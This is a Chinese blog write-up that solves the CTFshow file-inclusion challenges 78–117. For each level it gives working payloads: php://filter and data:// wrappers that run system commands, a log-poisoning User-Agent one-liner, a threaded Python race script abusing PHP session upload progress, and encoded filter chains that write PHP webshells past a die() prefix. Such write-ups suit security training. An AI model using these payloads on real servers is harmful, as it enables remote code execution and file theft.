CTFshow web入门——文件包含

已于 2022-03-12 15:57:14 修改
阅读量3.6k 收藏 34
点赞数 7
分类专栏: CTFshow——web入门 文章标签: php 安全 web安全
于 2021-02-07 16:42:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49480008/article/details/113696392
版权

目录

Web 78

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

一.分析代码:

使用 include进行了文件包含

二.解题过程:

构造playload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Web 79

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

一.分析代码:

替换了 php

二.解题过程:

构造playload:

?file=data://text/plain,<?= system("cat fla*");?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

Web 80-81

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

用日志包含绕过,将执行的命令插入日志中
这道题奇怪的是nginx日志在/var/log/nginx/access.log,一般apache日志在类似目录下(/var/log/httpd/access.log)

日志地址通常为

/var/log/nginx/error.log
/var/log/nginx/access.log

在这里插入图片描述

在User-Agent插入
<?php echo system('ls');?>
然后将日志包含进来
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述得到fl0g.php

然后将ls改成cat fl0g.php
在这里插入图片描述

Web 82-86

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

方法一:

利用session.upload_progress进行文件包含和反序列化渗透
通过观察代码,可以看到过滤了大部分的文件包含函数,这里我们利用PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含

以POST的形式发包,传的文件随意


<!DOCTYPE html>
<html>
<body>
<form action="http://b19c75ee-d5d9-4a02-8379-d988199962e2.chall.ctf.show:8080/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

在这里插入图片描述在这里插入图片描述在这里插入图片描述

抓包,这里我们添加一个 Cookie :PHPSESSID=flag ,PHP将会在服务器上创建一个文件:/tmp/sess_flag” (这里我们猜测session文件默认存储位置为/tmp),并在PHP_SESSION_UPLOAD_PROGRESS下添加一句话木马,修改如下

在这里插入图片描述因为我们在上面这个页面添加的ID值是flag,所以传参?file=/tmp/sess_flag

修改如下:这个a是随便加的,主要是为了方便爆破
在这里插入图片描述
条件竞争,将POST和GET的包都开启爆破,即可得到目录,
在这里插入图片描述

在这里插入图片描述
可以看到有fl0g.php,只要把ls改为 cat fl0g.php即可,修改如下:

在这里插入图片描述爆破即可得到flag
在这里插入图片描述

方法二:

import io
import sys
import requests
import threading

sessid = 'rainy'


def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://46cbafc4-4819-4ddf-8a83-a4023c622afe.chall.ctf.show:8080/',
            data={"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat *');?>"},
            files={"file": ('q.txt', f)},
            cookies={'PHPSESSID': sessid}
        )


def READ(session):
    while True:
        response = session.get(f'http://46cbafc4-4819-4ddf-8a83-a4023c622afe.chall.ctf.show:8080/?file=/tmp/sess_{sessid}')
        if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session,))
    t1.daemon = True
    t1.start()

    READ(session)

Web 87

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

不同变量死亡绕过。

base64就可以绕过/

正好是phpdie正好是6个字节,加2为,4的倍数,正好可以bse64解码。

构造

php://filter/write=convert.base64-decode/resource=1.php
url 两次编码之后

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

post传参 <?php phpinfo();?> 前面加 aa
content=aaPD9waHAgcGhwaW5mbygpOz8+

利用string.rot13过滤器

构造:

php://filter/write=string.rot13/resource=2.php

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%32%25%32%65%25%37%30%25%36%38%25%37%30

#post 传参 <?php phpinfo();?>
content=<?cuc cucvasb();?>

成功回显phpinfo();

还可以使用 string.strip_tags过滤器。

构造

?file=php://filter/write=string.strip_tags|convert.base64-decode/resource=3.php

/?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%33%25%37%34%25%37%32%25%36%39%25%37%30%25%35%66%25%37%34%25%36%31%25%36%37%25%37%33%25%37%63%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

post传入 <?php phpinfo();
PD9waHAgcGhwaW5mbygpOw==

虽然

Deprecated: file_put_contents(): The string.strip_tags filter is deprecated in /var/www/html/index.php on line 21

但访问3.php,成功显示phpinfo页面。
探索php://filter以及死亡绕过

Web 88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

正则匹配黑名单。

发现过滤的还是比较多,但是没有过滤 : 那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;base64,poc 其实和79差不多 只是注意的是编码成base64的时候要去掉 =

实际上就是去掉base64后的=,作为填充使用,不影响结果

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4
?file=data:text/plain,<?php phpinfo()?>
//base64取出=
?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgKi5waHAnKTs/Pg

Web 116

打开可以看到是一个视频
在这里插入图片描述
保存视频,用winhex打开发现包含png图片,分离出来
在这里插入图片描述分析代码这里过滤了几个过滤器,常用的base64肯定不能用了

直接构造playload:

?file=flag.php
或?file=compress.zlib:///var/www/html/flag.php

flag需要抓包才能出现
在这里插入图片描述

在这里插入图片描述

Web 117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

死亡绕过不同变量

这里过滤了 base64那就是 base64-decode了。

过滤了string不能使用 字符过滤器了,

但是convert还是可以使用 转换过滤器

可以使用convert.iconv.*
file_put_content和死亡·杂糅代码之缘
原理:对原有字符串进行某种编码然后再解码,这个过程导致最初的限制exit;去除。

构造

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
 post:contents=?<hp pvela$(P_SO[T]1;)>?

在这里插入图片描述在这里插入图片描述
可以看到原先的死亡语句已经变成了?<hp pid(e;)>?
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

小元砸
关注
  • 7
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF---Web---文件包含---09--etc/shadow
qq_22160557的博客
07-28 504
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTF—Web文件包含—09–etc/shadow 一、题目描述 题目: 文件包含 链接:http://172.16.15.216/stage/12/ 二、解题步骤 1、 构造payload 读取linux的/etc/shadow文件,用#截断目录 http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow# 三、总结 1、/etc/shadow
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web入门文件包含
qq_53263789的博客
07-19 687
ctfshow
ctfshow学习记录-web入门-文件包含-web78
最新发布
xhxuhuan的博客
06-22 254
include包含,直接用伪协议就可以。​filter:过滤convert:转变encode:编码resourece:资源。
ctfshow web入门-文件包含
LYJ20010728的博客
06-23 490
ctfshow web入门-文件包含web78web79web80 web78 filter伪协议读取:?file=php://filter/read=convert.base64-encode/resource=flag.php,base64解码 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } web79 由于过滤了 p
WEB-ctfshow入门文件包含
ing_end的博客
06-04 444
查看源码可以发现只能上传png图片 修改为php 修改上传格式为php,上传一句话马,蚁剑连接得flag 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。打开发现/upload下存在index.php文件,我们可以利用.user.ini, 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png 蚁剑连接得flag。 提示文件内容不合规,发现过滤了php,可使用短标签 蚁剑连接得f
ctfshow+web入门文件包含
m0_59448417的博客
04-13 707
ctfshow+web入门文件包含
CTFSHOW web193 left标注盲注脚本
05-04
其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 786
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFshow——web入门——文件包含
h_adam的博客
10-24 3952
web入门——文件包含web78 web78 题目 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 题解
CTFSHOW web入门 文件包含
羽的博客
04-28 3593
文章目录web78web79web80web81web82-86web87web88web116web117 web78 filter伪协议 payload file=php://filter/convert.base64-encode/resource=flag.php 解码后得到flag web79 data伪协议 payload file=data://text/plain,<?=`tac f*`;?> web80 远程文件包含 xxx为自己服务器地址 ?file=http://xxxx
【CTFSHOW】web入门文件包含
7ruth0hn的博客
07-23 1703
【CTFSHOW】web入门文件包含 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 没有过滤,一开始想直接包含flag.php,发现一片空白。使用php://filter伪协议读取flag.php内容,进行base64解码得到flag。 payload: ?file=php://filter/convert.base6
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 946
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
文件包含(ctfshow web入门
qq_47168481的博客
11-17 3383
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
ctfshow->web入门->文件包含
m0_74940843的博客
11-04 470
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
ctfshow web入门文件包含
05-24
我不确定你在问什么,但如果你是在问CTF中的Web入门题目,它可能包含以下内容: 1. 源代码:包含了网站的HTML、CSS和JavaScript代码,以及后端服务器脚本代码。 2. Robots.txt文件:该文件包含网站的爬虫指令,告诉爬虫哪些页面可以被访问,哪些不可以。 3. .htaccess文件:该文件包含了一些服务器配置信息,比如重定向和安全设置等。 4. 网站地图:该文件列出了网站的所有页面和链接,以便搜索引擎和用户能够更好地浏览网站。 5. Cookie:一些Web题目可能需要你使用cookie来获取敏感信息或者进行认证。 6. SQL注入:一些Web题目可能需要你使用SQL注入来获取敏感信息或者执行恶意代码。 7. 文件上传:一些Web题目可能需要你上传恶意文件来获取敏感信息或者执行恶意代码。 这只是一些可能的内容,不同的Web题目会有不同的挑战和难度。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值